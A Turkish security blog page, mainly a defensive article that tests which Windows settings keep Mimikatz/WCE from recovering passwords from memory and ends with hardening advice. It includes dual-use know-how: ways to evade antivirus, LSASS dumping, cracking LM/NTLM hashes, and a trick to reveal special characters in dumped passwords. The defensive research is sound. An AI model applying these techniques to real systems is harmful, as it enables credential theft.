psexec etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
psexec etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

22 Aralık 2014 Pazartesi

MSF Psexec Komutu Çalıştırılırken Alınabilecek Hatalar ve Sebepleri

MSF Psexec Komutu Çalıştırılırken Alınabilecek Hatalar ve Sebepleri

Önceki bir yazıda, MSF psexec modülü kullanılarak, parola/parola özeti ile bir bilgisayarın komut satırına düşülebildiği incelenmişti. Ancak, bazı durumlarda, psexec modülü veya diğer MSF modülleri çalıştırılırken beklendiği gibi çalışmayabilir. Bu durumun bir çok sebebi olabilir. Bu yazıda MSF psexec modülü çalıştırılırken alınabilecek hatalar listelenecek ve bu hataların gerçekleşme sebepleri listelenecektir.

Yazının devamı için bakınız:
http://www.siberportal.org/red-team/windows-operating-system-penetration-tests/having-trouble-in-using-msf-psexec-exploit-module-and-possible-reasons-of-these-error-messages

3 Aralık 2014 Çarşamba

Bellekten Parolaların Elde Edilmesinin Engellenmesi İçin Tavsiyeler

Bellekten Parolaların Elde Edilmesinin Engellenmesi İçin Tavsiyeler


Bellekten parolanın açık olarak elde edilmesi ile ilgili önceki yazıda parolanın nasıl elde edildiği konusuna değinilmiş ve aşağıdaki gibi özetlenmişti:
Oturum açmak için yazdığımız kullanıcı adı ve parola gibi bilgiler, belleğe (RAM) yüklenen ve kimlik doğrulama işleminde görev alan bazı kütüphane dosyalarında şifreli olarak saklanmakta ve bu bilgiler kimlik doğrulama işlemleri sırasında kullanılmaktadır. Bunun yanında Mimikatz / WCE gibi bazı araçlar RAM üzerinde tutulan şifreli parolayı ve  şifreleme anahtarını elde ederek, şifreli parolayı deşifre etmekte, böylece parolanın açık olarak elde edilmesini sağlamaktadır.

Bu yazıda ise, kurumsal bir etki alanı (domain) ortamında, sızılan bir bilgisayardaki RAM üzerinden kullanıcı parolalarının açık olarak elde edilmesini zorlaştırmak ve önlemek için atılması tavsiye edilen adımlardan bahsedilecektir. Bu tavsiyeler 6 ana başlık altında toplanacak olup, yazının sonunda ise tavsiyeler özetlenecektir. Aşağıdaki başlıklardaki durumlar anlatılırken, SIRKET adlı bir etki alanına sahip bir kurumda PC1 adlı bir bilgisayarın ele geçirildiği varsayılıp, belli senaryolar üzerinden gidilecektir. Bu senaryolardaki bazı nesneler aşağıdaki gibidir.

  • SIRKET: Kurumdaki etki alanının (Domain) adı
  • SRV1: Etki alanı denetleyicisi (Domain Controller)
  • EaYoneticisi1: Etki alanındaki bir kullanıcı (Domain User)
  • PC1: Saldırgan tarafından ele geçirilen etki alanı bilgisayarı (Domain Computer)
  • Kurban ve YerelKullanici: PC1 bilgisayarındaki yerel kullanıcılar (Local User)


Başlıklar ve alt başlıklar altındaki her bir senaryo uygulanırken bilgisayar yeniden başlatılmıştır. Bu sebeple, her senaryo birbirinden bağımsız olarak düşünülmelidir.

Bunun yanında senaryolara ait ekran görüntülerinde bazı kontrol araçları kullanılmıştır. Bu araçlar ve araçların kullanılmasındaki amaçlar şu şekildedir:

  • Mimikatz: PC1 bilgisayarından hangi kullanıcılara ait parolaların açık olarak elde edilip edilemediği kontrol edilir.
  • Görev Yöneticisi - Kullanıcılar Sekmesi (Task Manager - Users) ve Qwinsta: PC1 bilgisayarındaki oturumları ve oturum durumlarını listelemek için kullanılmıştır.
  • Netstat: PC1 bilgisayarına SRV1 bilgisayarından olan bağlantıları listelemek için kullanılmıştır.
  • Tasklist: PC1 bilgisayarında EAYoneticisi1 adlı kullanıcı tarafından oluşturulan prosesleri listelemek için kullanılmıştır.
Bu ön bilgilerden sonra başlıklar, alt başlıklar ve senaryolar incelenebilir.

A) Oturum Sonlandırma İşlemleri

Bir makinede oturum açma işlemi temel olarak konsol üzerinden etkileşimli oturumla veya uzak masaüstü oturumuyla gerçekleştirilebilir. Bu oturumlardan çıkış yapılırken kullanıcı değiştirme (switch user), uzak bağlantıyı kesme (disconnect), oturumu kapatma (log off) veya bilgisayarı yeniden başlatma / kapatma (restart / shutdown) gibi yollar izlenebilir.

1) Kullanıcı Değiştirme (Switch User)

PC1 üzerinde Sirket\EaYoneticisi1 adlı kullanıcı oturumunu açıp işlemlerini tamamladıktan sonra kullanıcı değiştirme seçeneği kullanılarak oturumundan çıkış yapmıştır. Daha sonra PC1\Kurban adlı kullanıcı ile oturum açılmıştır. Bu durumda her iki kullanıcının parolasının elde edilebildiği görülmektedir.

Şekil - 1: Kullanıcı Değiştirme Yöntemi ile Oturum Sonlandırma

Yorum: Oturum sonlandırmak için oturumu değiştir seçeneği kullanılmamalıdır.

2) Oturum Bağlantısının Düşmesi (Disconect Your Session Immediately)

PC1\YerelKullanıcı adlı kullanıcı ile oturum açık durumda iken, Sirket\EaYoneticisi1 adlı kullanıcı uzak masaüstü erişimi gerçekleştirmiştir. Varsayılan olarak bir istemcide bir konsol açık olabildiği için, PC1\YerelKullanici adlı kullanıcının oturumu düşmüştür. Bu durumda her iki kullanıcının parolasının elde edilebildiği görülmektedir.


Şekil - 2: Oturum Düşürme Yöntemi ile Oturum Sonlandırma

Yorum: Oturum düştüğünde parolalar elde edilebilmektedir.

3) Uzak Masaüstü Bağlantısını Kesme (Disconnect)

Bir önceki senaryo ile aynı adımlar izlendikten sonra Sirket\EaYoneticisi1 adlı kullanıcı uzak masaüstü oturumunu sonlandırmak için bağlantıyı kes (Disconnect) seçeneğini kullanmaktadır.

Şekil - 3: Oturumu Sonlandırma İşlemi

Daha sonra PC1\YerelKullanici adlı kullanıcı ile tekrar oturum açılmaktadır (Bu işlem yerine Sirket\EaYoneticisi1 adlı kullanıcının oturumu aktifken, PC1\YerelKullanici adlı kullanıcı ile tekrar oturum açarak uzak masaüstü erişimi de kesilebilirdi.). Bu durumda her iki kullanıcının parolasının elde edilebildiği görülmektedir.


Şekil - 4: Oturumu Sonlandırma Yöntemi ile Oturum Sonlandırma

Yorum: Oturum sonlandırmak için bağlantıyı kes seçeneği kullanılmamalıdır.

4) Oturumu Kapatma (Log off)

Sirket\EaYoneticisi1 adlı kullanıcı oturum açtıktan sonra oturumunu kapatmaktadır (log off). Sonrasında PC1\Kurban adlı kullanıcı ile oturum açılmakta ve bu oturum da kapatılmaktadır (log off). Daha sonrasında ise PC1\YerelKullanici adlı üçüncü kullanıcı ile oturum açılmıştır. Bu durumda PC1\Kurban adlı kullanıcının parolası alınamamışken, Sirket\EaYoneticisi1 ve PC1\YerelKullanici adlı kullanıcıların parolalarının elde edilebildiği görülmektedir.

Şekil - 5: Oturumu Kapatma Yöntemi ile Oturum Sonlandırma - 1

Yorum: Oturum sonlandırmak için oturumu kapatma seçeneği kullanılmamalıdır.

Not: Aynı adımlar takip edilip bir kere daha deneme yapıldığında ise Sirket\EAYoneticisi1 adlı kullanıcının da parolası elde edilememiş, sadece PC1\YerelKullanici parolası elde edilebilmiştir.


Şekil - 6: Oturumu Kapatma Yöntemi ile Oturum Sonlandırma - 2

Yorum: Bazı durumlarda oturumu sonlandırmak için oturumu kapat (log off) seçeneği yeterli oluyorken, her zaman için bu durum doğru olmayabilmektedir. Bu sebeple bilgisayarı yeniden başlatmak (restart) veya kapattıktan sonra (shutdown) yeniden açmak parolanın bellek üzerinden elde edilmesini önlemek için en garanti çözüm olmaktadır.

B) Güvenli Parola Kullanma

Bu başlık altında parolaların güçlü olmasının RAM üzerinden parolaların elde edilmesi üzerindeki etkisi üzerinde durulacaktır.

1) Parola Uzunluğu ve Karmaşıklığı

Bu senaryoda PC1\YerelKullanici adlı kullancının parolası (Siber123.Guvenlik?) 18 karakter olarak oluşturulmuş, içerisinde büyük/küçük harf, sayı ve noktalama işaretleri kullanılmıştır. Oldukça karmaşık gibi görünen bu parola bellek üzerinden elde edilebilmiştir.


Şekil - 7: Uzun ve Karmaşık Parola Kullanımı - 1

Yorum: Karmaşık ve uzun parolaların kullanılması birçok saldırı için en kritik adımlardan birisidir. Ancak parolaların bellek üzerinden elde edilmesi için yeterli olmamaktadır.

2) Parolada Daha Özel Karakterlerin Kullanılması

Parola oluşturulurken karmaşıklığı arttırmak için karakter kümesi arttırılabilir. Bu amaçla daha karmaşık karakterler kullanılarak PC1\Kurban adlı kullanıcı için yeni bir parola (SiberæGuvenlik€123) belirlenmiştir. Oldukça karmaşık gibi görünen bu parola bellek üzerinden kısmen elde edilebilmiştir.


Şekil - 8: Uzun ve Karmaşık Parola Kullanımı - 2

Ekran görüntüsünde de görüldüğü gibi, € (euro) karakteri yerine ? (soru işareti)  karakteri gelmektedir. Parolanın tamamı elde edilemediği düşünüldüğünde, saldırganın işinin kısmen zorlaştırılmış olduğu düşünülebilir. Ancak saldırgan, kısmen elde ettiği parolanın kalan karakterlerini tahmin yöntemi kullanılarak (é, è, ê, ë, £, ∑, ... gibi) da tespit edilebilir. Bunun yanında aracın çalıştırıldığı komut satırı yazı formatı değiştirilerek de parola çok kolay bir şekilde edilebilir. Bu işlem için komut satırı özelliklerinden Yazı sekmesine gelerek Lucida Console gibi bir formatın seçilmesi yeterli olacaktır.

Şekil - 9: Komut Satırı Font Değişikliği

Böylece parola özel kullanılan formatlar da dahil olmak üzere tamamen elde edilebilmektedir.


Şekil - 10: Font Değişikliği Sonrası Uzun ve Karmaşık Parola Kullanımı

Not: ALT tuşu ile kombinasyon oluşturan sayı listesi bağlantıdaki gibidir. Bunun yanında, ALT tuşu ile kombinasyon oluşturan sayıların kullanımı bağlantıdaki gibidir.

Yorum: Parola karmaşıklığı, parolanın bellek üzerinden elde edilmesi için yeterli olmamaktadır. Ancak parola güvenliği için aşağıdaki sıkılaştırma işlemlerinin gerçekleştirilmesi tavsiye edilmektedir:

  • Parolalar en az 10 karakter uzunlukta ve karmaşık olarak belirlenmelidir.
  • Parolalar en fazla 2 ayda bir değiştirilmelidir.
  • Oluşturulan parolalar birbirinden farklı, birbiriyle ilişkisiz ve başka yerlerde (forum, kişisel mail gibi) kullanılmayan parolalardan oluşmalıdır.
  • Parola politikalarında LM özetin kullanılması önlenmelidir. “Network security: Do not store LAN Manager hash value on next password change” ilkesi etkin olmalıdır. Bu işlem için Kayıt Defterin'de "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash" değeri 1 de yapılabilir.
  • Parola güvenliği ve güvenilir parola oluşturma ile ilgili Bilgimi Koruyorum sayfası incelenebilir.

Not: Parola oluşturulurken kullanılan sistemlerin oluşturulan parolaları destekleyip desteklemediği test edilmelidir.

C) Kullanılmayan Kütüphanelerin (DLL) Kaldırılması

Bir önceki yazıda da belirtildiği gibi, Windows işletim sistemindeki kimlik doğrulama paketleri LSA (Local Security Authority) tarafından belleğe yüklenir. LSA, hangi DLL dosyalarını yükleyeceğini kayıt defterindeki “HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages” kaydından alır. Bu kayıtta bulunmayan paketler belleğe yüklenmeyecektir. Varsayılan durumda bir PC1 gibi Windows 7 işletim sistemi yüklü bir bilgisayarda Security Packages değerinin altında 6 DLL mevcuttur: kerberos, msv1_0, schannel, wdigest, tspkg, pku2u. Her bir DDL kimlik doğrulamasında bir takım işlemler gerçekleştirmek için görevlidir. Örneğin, tsPkg bilgsayarlar arasında parola sorgusu gerçekleştirmeden erişim için gereklidir. Bu güvenlik paketinin kaldırılması MS12-020 gibi DOS zafiyetine sahip olan bilgisayarlar için tavsiye edilmektedir. Ancak, Hyper V gibi bazı sistemlerde oturum işlemleri için bu DLL yüklenmek belleğe yüklenmek zorundadır. Bir diğer kimlik doğrulama paketi olan wdigest ise, OWA (Outlook Web Access) gibi uygulamalar için LM/NTLM ile ağ üzerinden kimlik doğrulaması için kullanılır. Etki alanındaki en önemli güvenlik paketlerinden birisi olan kerberos ise, belirlenen bir süre sonunda (10 saat gibi) hesap önbiletinin (TGT) yenilenmesi için gereklidir. Bilgisayarlarda bu şekilde parola ve parola özetlerinin şifreli tutulmasının nedeni, ağ üzerinden yapılan standart kimlik doğrulama protokollerini (Kerberos, NTLM/LM sorgulama-cevaplama gibi) desteklemeyen servislerin her defasında şifre sormasını engellemek, yani bu servislere SSO desteği kazandırmaktır. Böylece bu servisler parolanın veya özetinin açık hali gerektiği zaman RAM üzerinden şifre çözme işlemi gerçekleştirilir ve servise açık halde verilir. Servis de bu bilgiyi kullanarak kendi işlevini yerine getirir.

Bu başlıkta, PC1 bilgisayarından Mimikatz aracının parolaları açık olarak ele geçiremediği 3 güvenlik paketi (msv1_0, schannel, pku2u) bırakılmış, diğerleri (kerberos, wdigest, tspkg) ise silinmiştir.
Şekil - 11: Güvenlik Paketleri

Daha sonra bilgisayar yeniden başlatılmıştır. Bu başlık altındaki senaryolar 3 güvenlik paketi (kerberos, wdigest, tspkg) silinmiş olduğu durumda gerçekleştirilmiştir.

1) Uzak Masaüstü Bağlantısı Denemesi

PC1 bilgisayarına port taraması gerçekleştirilmiştir. Bu durumda uzaktan masaüstü erişim portunun (3389) açık olduğu görülmektedir.

Şekil - 12: Güvenlik Paketlerinin Silinmesi Sonrası Uzak Masaüstü Servis Kontrolü

Ancak, PC1 bilgisayarına uzak masaüstü bağlantısının gerçekleştirilemediği görülmüştür.


Şekil - 13: Güvenlik Paketlerinin Silinmesi Sonrası Uzak Masaüstü Denemesi

Yorum: Bazı kimlik doğrulama paketlerinin silinmesi istenmeyen durumların ortaya çıkmasına sebep olabilir.

2) 14 Karakterden Daha Kısa Uzunluktaki Parolanın Kullanılması

Uzak masaüstü erişim gerçekleştirilememesine rağmen,  konsol üzerinden ise erişimin gerçekleştirilebildiği görülmektedir. Bu senaryoda kullanıcı parolaları 14 karakterden kısa olacak şekilde seçilmiştir.

Sirket\EaYoneticisi1 aldı kullanıcı oturum açıp işlemlerini tamamladıktan sonra kullanıcı değiştirme seçeneği kullanılarak oturumdan çıkış yapmıştır. Daha sonra PC1\YerelKullanici adlı kullanıcı ile oturum açılmıştır. Bu durumda her iki kullanıcının parolasının da açık olarak elde edilemediği, parolanın sadece LM ve NTLM özetlerinin elde edilebildiği görülmektedir.

Şekil - 14: Güvenlik Paketlerinin Silinmesi Sonrası Kısa Parola ile Oturum Açma İşlemi

Ancak, çeşitli araçlarla veya internetten çevrim içi olarak bu hizmeti sunan siteler (Ophcrack , MD5Decrypter  gibi) kullanılarak, parolaların LM/NTLM özetlerinden parolaların açık hali elde edilebilir. Şöyle ki;

PC1\YerelKullanici adlı kullanıcı için LM/NTLM parola özetinden parolanın açık halinin elde edilmesi sonucu aşağıdaki gibidir:

Şekil - 15: 14 Karakterden Kısa Parolalara Ait LM ve NTLM Özetlerinin Bellekten Elde Edilmesi - 1

Sirket\EaYoneticisi1 adlı kullanıcı için LM/NTLM parola özetinden parolanın açık halinin elde edilmesi sonucu aşağıdaki gibidir:

Şekil - 16: 14 Karakterden Kısa Parolalara Ait LM ve NTLM Özetlerinin Bellekten Elde Edilmesi - 2

Yorum: Bilgisayar parola ilkelerinden LM özeti tutulması engellenmiş olsa (“Network security: Do not store LAN Manager hash value on next password change” ilkesi etkin olduğu durumda) dahi, 14 karakterden kısa parolalar için RAM üzerinde parolanın LM özeti saklanmaktadır.

3) 14 Karakterden Daha Uzun Parolanın Kullanılması

Bir önceki senaryo kullanıcı parolaları 14 karakterden uzun olacak şekilde tekrarlanmıştır. Bu senaryoda PC1\YerelKullanici adlı kullanıcının parolası Siber123.Siber123. olarak, Sirket\EaYoneticisi1 adlı kullanıcının parolası ise Aa123456.Aa123456. olarak belirlenmiştir. Bu durumda her iki kullanıcının parolasının da açık olarak elde edilememesinin yanında parolanın LM özetinin de elde edilemediği, sadece NTLM özetlerinin elde edilebildiği görülmektedir.

Şekil - 17: Güvenlik Paketlerinin Silinmesi Sonrası Uzun Parola ile Oturum Açma İşlemi

Bir önceki senaryo ile aynı yöntemler kullanılarak, parolaların NTLM özetlerinden parolaların açık hali elde edilmeye çalışılmış olsa da LM özeti olmadan parolanın açık hali elde edilememiştir. Şöyle ki;

PC1\YerelKullanici adlı kullanıcı için NTLM parola özetinden parolanın açık halinin elde edilememesi durumu aşağıdaki gibidir:

Şekil - 18: 14 Karakterden Uzun Parolalara Ait NTLM Özetlerinin Bellekten Elde Edilmesi - 1

Sirket\EaYoneticisi1 adlı kullanıcı için NTLM parola özetinden parolanın açık halinin elde edilememesi durumu aşağıdaki gibidir:
Şekil - 19: 14 Karakterden Uzun Parolalara Ait NTLM Özetlerinin Bellekten Elde Edilmesi - 2

Yorum: Bellek üzerinden parolalara ait LM özetin tutulmaması için güvenlik ilkelerinin ayarlanmasının yanında parola uzunluğunun 14 karakterden uzun olması da önem arz etmektedir. Bu sebeple parola oluşturulurken 14 karakterden uzun olması tavsiye edilmektedir.

D) İstemci Taraflı Koruma Sistemleri

Mimikatz, WCE gibi araçların dosya sistemine yüklenmesi antivirüs gibi sistemler tarafından tespit edilmesine sebep olmaktadır. VirusTotal , yüklenen dosyanın (veya URL’i verilen sayfanın vs) özetini alarak kendisinde, sisteminde kayıtlı olan antivirüsler tarafından bu dosyanın zararlı olarak algılanıp algılanmadığı bilgisini sunan bir hizmettir. 21 Aralık 2012 tarihi itibariyle VirusTotal üzerinde 64 bit mimari için hazırlanmış Mimikatz aracını tespit edebilen 12 antivirüs ürünü bulunmaktadır.

Şekil - 20: Mimikatz Aracının Antivirüsler Tarafından Tespit Edilme Oranı


VirusTotal ile ilgili ayrıntılı bilgi için bakınız.

Bu sebeple bilgisayarlar üzerinde antivirüs kullanılması saldırganların işini zorlaştıracaktır. Ancak çeşitli yöntemlerle antivürüsler atlatılarak (AV Bypass) bellek üzerinden parolalar elde edilebilir. Bu yöntemlerden bazıları aşağıdaki gibidir:

  • Antivirüs duraklatılabilir, durdurulabilir, antivirüs servisinin kapatılabilir. Böylece antivirüs çalışmaz hale getirilebilir.
  • Antivirüsler imza tabanlı çalışmaktadırlar. Paketleyiciler kullanılarak veya başka yöntemlerle zararlı yazılımın değiştirilmesi, antivirüslerin zararlıyı tespit edememesine sebep olabilir.
  • Birçok antivirüs sabit disk üzerinde kontrollerini gerçekleştirir, RAM üzerinde çalışan ve sabit disk ile etkileşimi olmayan zararlıları yakalayamaz. Örneğin, Mimikatz aracının RAM üzerinde çalışan versiyonları antivirüsler tarafından yakalanamayabilmektedir.
  • Bellekteki parolalar temel olarak LSASS prosesinden elde edilebilmektedir. Bu prosesin dump halini alan saldırgan, kendi bilgisayarında çeşitli araçlar kullanarak parolanın açık halini elde edebilir. Bu gibi bir durumda antivirüs herhangi bir zararlı aktivite tespit edemeyebilir.

Yorum: Antivirüs kullanılması saldırı yüzeyini daraltmakla birlikte kesin çözüm değildir.

E) Uzaktan  Erişim Yöntemleri

Ağ üzerinden bilgisayarlar arasında erişim için uzak masaüstü haricinde yöntelmer de bulunmaktadır. Bu başlık altında ağ üzerinden erişim sağlandığında parola bilgilerinin RAM üzerinde açık olarak saklanıp saklanmadığı senaryolar üzerinden gösterilecektir. Bu başlık altındaki senaryolarda, SRV1 adlı bilgisayarda Sirket\EaYoneticisi1 adlı kullanıcı, PC1 adlı bilgisayarda PC1\YerelKullanıcı adlı kullanıcı oturum açmış bulunmaktadır.

1) Kullanıcı Bilgileri Kullanılarak PsExec ile Erişim

Sirket\EaYoneticisi1 adlı kullanıcı, PC1 adlı bilgisayara SysInternals PsExec aracı ile bağlantı kurmaktadır. PsExec aracı, uzak bilgisayarın yönetimsel paylaşımına (ADMIN$) erişim için kullanılan bir araç olarak tanımlanabilir. Bu araç ile bağlantı sırasında kullanıcı adı ve parola bilgisi kullanılabilmektedir.

Şekil - 21: PsExec Aracı ile Kimlik Bilgilerini Kullanarak Ağ Üzerinden Erişim

Böylece PC1 adlı bilgisayarın dosya sistemine, kimlik bilgisi verilen kullanıcı ile giriş yapılmıştır. Aynı bilgisayar üzerinde PC1\YerelKullanici adlı kullanıcı ile oturum açık bulunmaktadır. Bu durumda her iki kullanıcının parolasının elde edilebildiği görülmektedir. Ayrıca Sirket\EaYoneticisi1 adlı kullanıcının da PC1 adlı bilgisayar üzerinde prosesler başlattığı (cmd.exe ve conhost.exe) görülmektedir.

Şekil - 22: PsExec Aracı ile Kimlik Bilgilerini Kullanarak Ağ Üzerinden Erişimin Hedef Bilgisayarda İncelenmesi

Yorum: PsExec aracına kullanıcı bilgileri yazılarak ağ üzerinden erişim sağlanmamalıdır.


2) Kullanıcı Bilgileri Kullanılmadan PsExec ile Erişim
Bir önceki senaryo PsExec aracına kimlik bilgisi verilmeden de gerçekleştirilebilir. Bu durumda komut satırını çalıştıran kullanıcının hakları ile bağlantı sağlanır. Diğer bir deyişle, SRV1 adlı bilgisayarda PsExec aracını kullanan kullanıcı (Sirket\EaYoneticisi1 adlı kullanıcı) hakları ile bağlantı oluşturulmaktadır.


Şekil - 23: PsExec Aracı ile Kimlik Bilgilerini Kullanmadan Ağ Üzerinden Erişim

Böylece, PC1 adlı bilgisayarın dosya sistemine, PsExec aracını kullanan kullanıcı hakları ile giriş yapılmıştır. Aynı bilgisayar üzerinde PC1\YerelKullanici adlı kullanıcı ile oturum açık bulunmaktadır. Bu durumda sadece PC1\YerelKullanici adlı kullanıcının parolasının elde edilebildiği, Sirket\EaYoneticisi1 adlı kullanıcının parolasının elde edilemediği görülmektedir. Bunun yanında, Sirket\EaYoneticisi1 adlı kullanıcının da PC1 adlı bilgisayar üzerinde, bir önceki senaryoda olduğu gibi, prosesler başlattığı (cmd.exe ve conhost.exe) görülmektedir.


Şekil - 24: PsExec Aracı ile Kimlik Bilgilerini Kullanmadan Ağ Üzerinden Erişimin Hedef Bilgisayarda İncelenmesi

Yorum: PsExec aracına kullanıcı bilgileri verilmeden ağ üzerinden erişim sağlanılması durumunda, mimikatz aracı ile RAM üzerinden uzaktan erişimi gerçekleştiren kullanıcının parolası açık olarak elde edilemez. Ancak yeni bir prosesin oluşturulması, bağlantı boyunca bu proseslerin yaşamlarına devam etmesi, bu süre boyunca saldırganın oluşturduğu bir prosesin bu proseslere sıçrayabiliyor (migration) olması veya saldırgana ait prosesin bu proseslermiş (impersonation) gibi bu prosesler üzerindeki bazı bilgileri (jeton - token) alabiliyor olması, prosesi çalıştıran kullanıcının haklarının ele geçirilmiş olması anlamına da gelebilmektedir. Bu hakların sadece mevcut bilgisayar üzerinde etkin olması, ağdaki diğer servislere erişim kullanılamaması için, özellikle kritik hesapların “Account is sensitive and cannot be delegated” adlı özelliğinin seçilmiş olması tavsiye edilmektedir.

3) Kayıt Defteri ile Uzaktan Erişim

PC1 adlı bilgisayardaki “Remote Registry” adlı servis etkin ve başlatılmış durumdadır. SRV1 adlı bilgisayar üzerinden PC1 adlı bilgisayarın Kayıt Defteri’ne (Registry Editor) erişim sağlanmaktadır.


Şekil - 25: Kayıt Defteri ile Ağ Üzerinden Erişim

Bu durumda PC1 adlı bilgisayarda sadece PC1\YerelKullanici adlı kullanıcının parolası elde edilebilmektedir. Bunun yanında PC1 adlı bilgisayarda herhangi bir prosesin başlatılmadığı görülmektedir.


Şekil - 26: Kayıt Defteri ile Ağ Üzerinden Erişimin Hedef Bilgisayarda İncelenmesi

Yorum: Uzaktan kayıt değerlerine erişim sağlanırken parolalar açık olarak elde edilemez. Ancak bu işlemin gerçekleşmesi için “Remote Registry” servisinin çalıştırılması güvenlik zafiyetine sebep olmaktadır.

4) Yönetimsel Paylaşımlarla Dosya Sistemine Uzaktan Erişim

Sirket\EaYoneticisi1 adlı kullanıcı, PC1 adlı bilgisayarın dosya sistemine (yönetimsel paylaşımına) erişmektedir.

Şekil - 27: Dosya Paylaşımı ile Ağ Üzerinden Erişim

Bu durumda PC1 adlı bilgisayarda sadece PC1\YerelKullanici adlı kullanıcının parolası elde edilebilmektedir. Bunun yanında PC1 adlı bilgisayarda herhangi bir prosesin başlatılmadığı görülmektedir.

Şekil - 28: Dosya Paylaşımı ile Ağ Üzerinden Erişimin Hedef Bilgisayarda İncelenmesi

Benzer sonuçlar, yönetimsel paylaşımlara erişim için kullanılan “net use” komutu ile de alınmaktadır. Şöyle ki, “net use” komutunu kimlik bilgisi kullanarak (net use \\PC1\ADMIN$ /user:Sirket\EaYoneticisi1 Aa123456.) veya kimlik bilgisi olmadan (net use \\PC1\ADMIN$) dosya sistemine erişim durumunda, erişimi gerçekleştiren kullanıcının parolası, erişimin gerçekleştirildiği bilgisayar üzerinden elde edilememektedir. Dosya paylaşımına erişim sağlayarak betikler çalıştırılabildiğinden "Remote Registry" servisinin açık bırakılmasına gerek kalmamaktadır.

Yorum: Dosya sistemine erişim için paylaşımların kullanılması tavsiye edilmektedir. Paylaşımların belirli IP'lerden (etki alanı denetleyicisi veya jump server gibi ara bilgisayarlardan) gelen taleplere açık olması tavsiye edilmektedir. Bunun yanında, dizinlerin dosya sistemi üzerindeki (NTFS) ve ağ üzerindeki (Sharing) erişimlere ait güvenlik konularına da önem verilmelidir. Ancak bu konular kapsam dışında olduğu için değinilmeyecektir.

5) Diğer Uzaktan Erişim Araçları

Ağ üzerinden bilgisayarlara erişimler için diğer bir çok yöntem bulunmaktadır. WMIC (wmic /node:PC1 process list brief), powershell, yönetim konsolu (MMC) gibi yöntemler ile erişim gerçekleştirildiğinde hedef bilgisayar (PC1 adlı bilgisayar) üzerinde parolalar açık olarak elde edilemez. Ancak bu yöntemlerin kullanılması için hedef bilgisayarda bazı servislerin çalışması gerekmektedir. Bu servislerin açık bırakılması ise saldırı yüzeyini arttırmaktadır.



F) Güncelleştirmelerin Gerçekleştirilmesi

Microsoft tarafından yayınlanan KB2871997 paketi ile RAM üzerinden parolaların elde edilmesi zorlaştırılmıştır. Ancak henüz tamamen engellenememiştir. Konu ile ilgili ayrıntılı bilgi için bakınız.


G) Sonuç: Tüm Tavsiyeler

Bu başlık altında diğer başlıklar altında bahsedilen tavsiyeler tekrar edilecek ve ek tavsiyelerde bulunulacaktır. Bu tavsiyeler aşağıdaki gibidir:

  • Kritik kullanıcı hesapları ile (özellikle saldırıya açık konumda bulunan DMZ içerisindeki ve istemciye açık olan) bilgisayarlarda, oturum açılamamalıdır. Bu bilgisayarlardakiişlemler için yerel kullanıcılar veya belirlenen işlemler gerçekleştirmek için oluşturulan etki alanı hesapları (Teknik Destek hesabı gibi) kullanılmalıdır.
  • Saldırıya açık konumdaki bilgisayardaki oturumların süresi sınırlandırılmalıdır. Belli aralıklarla bilgisayar yeniden başlamalıdır. Ancak ele geçirilen bir bilgisayardan diğer bilgisayarlara erişim mümkün olabildiği için, tüm bilgisayarlarda bu işlemin gerçekleştirilmesi tavsiye edilmektedir.
  • Açık olan bir oturumu sonlandırmak için bilgisayar yeniden başlatılmalıdır.
  • 14 karakterden daha uzun parolalar kullanılmalıdır. Parolalar küçük harf, büyük harf, rakam, noktalama işaretleri gibi özel karakter içermelidir.
  • Gereksiz güvenlik paketleri kaldırılmalıdır. Ancak bu işlemin çeşitli problemlere yol açabileceği unutulmamalıdır.
  • Antivürüs gibi istemci üzerinde koruma sağlayan mekanizmalar güncel ve etkin olmalıdır.
  • Uzaktan erişimler için dosya paylaşımları tercih edilmelidir. Bu paylaşımlara erişimlere belirli bilgisayarlardan (IP) ve hesaplardan izin verilmelidir.
  • Kimlik doğrulaması için akıllı kartın kullanılması tavsiye edilmektedir. Güvenilir olarak tasarlanmış akıllı kartlarda parola yerine PIN kullanılmakta ve kullanıcı hesabına ait özel bilgi (private key), akıllı kart içerisinden alınamamaktadır.
  • Kullanıcı hesaplarına, servis veya zamanlanmış görev (scheduled jobs) başlatan hesaplara, gereğinden fazla yetki (Domain Admin yetkileri gibi) verilmemelidir.
  • Tespit amaçlı olarak da, belli olaylar gerçekleştiğinde kayıtların / alarmların oluşturulması ve oluşturulan alarmların izlenmesi tavsiye edilmektedir.
  • Microsoft'un KB2871997 güncelleme paketi indirilmelidir.


Bu yazıda bellek üzerinden kimlik bilgilerinin elde edilmesini zorlaştırmak ve elde edilmesini engellemek  için gerçekleştirilebilecek yöntemlerden bahsedilmiştir. Bu yöntemlerin, özellikle kritik sistemlere sahip kurumlarda, incelenmesi tavsiye edilmektedir. Bunun yanında, en önemli korunma yönteminin saldırganların sistemlere erişmesini engellemek ve RAM üzerinden bilgi alabilecek kadar sistemlere sızabilmesine imkan sağlamamak olduğu unutulmamalıdır.


Kaynak:
[1] http://www.bilgiguvenligi.gov.tr/windows-isletim-sisteminde-oturum-acma-islemi-winlogon.html
[2] http://msdn.microsoft.com/tr-tr/magazine/cc163489(en-us).aspx
[3] http://technet.microsoft.com/en-us/library/ff404303(v=ws.10).aspx
[4] http://blog.bga.com.tr/2013/01/mimikatz-ile-windows-sistemlerde.html
[5] http://ertugrulbasaranoglu.blogspot.com/2012/10/ipucu-wceden-kacnma-yontemi.html
[6] http://blog.opensecurityresearch.com/2012/06/using-mimikatz-to-dump-passwords.html
[7] http://technet.microsoft.com/en-us/library/cc778868(WS.10).aspx
[8] http://www.ampliasecurity.com/research/wce12_uba_ampliasecurity_eng.pdf
[9] http://www.ampliasecurity.com/research/WCE_Internals_RootedCon2011_ampliasecurity.pdf
[10] http://technet.microsoft.com/en-us/library/dn169026(v=ws.10).aspx
[11] http://technet.microsoft.com/en-us/library/dn169016(v=ws.10).aspx
[12] http://codeidol.com/community/windows/logon/25019/
[13] http://fr.slideshare.net/gentilkiwi/mimikatz-asfws
[14] http://www.sans.org/reading-room/pass-the-hash-attacks-tools-mitigation-33283
[15] http://danielaelmi.altervista.org/password-cracking-hashes-dumping-brute-forcing-auditing-and-privileges-escalation/
[16] http://www.blackhat.com/presentations/bh-dc-09/Muckin/BlackHat-DC-09-Muckin-vista-security-internals.pdf
[17] http://umut-simsek.blogspot.com/2013/04/hashini-seven-kovboy-heykrlara-karsi.html
[18] https://www.bilgiguvenligi.gov.tr/microsoft-guvenligi/bellekten-parolalarin-elde-edilmesi-1.html
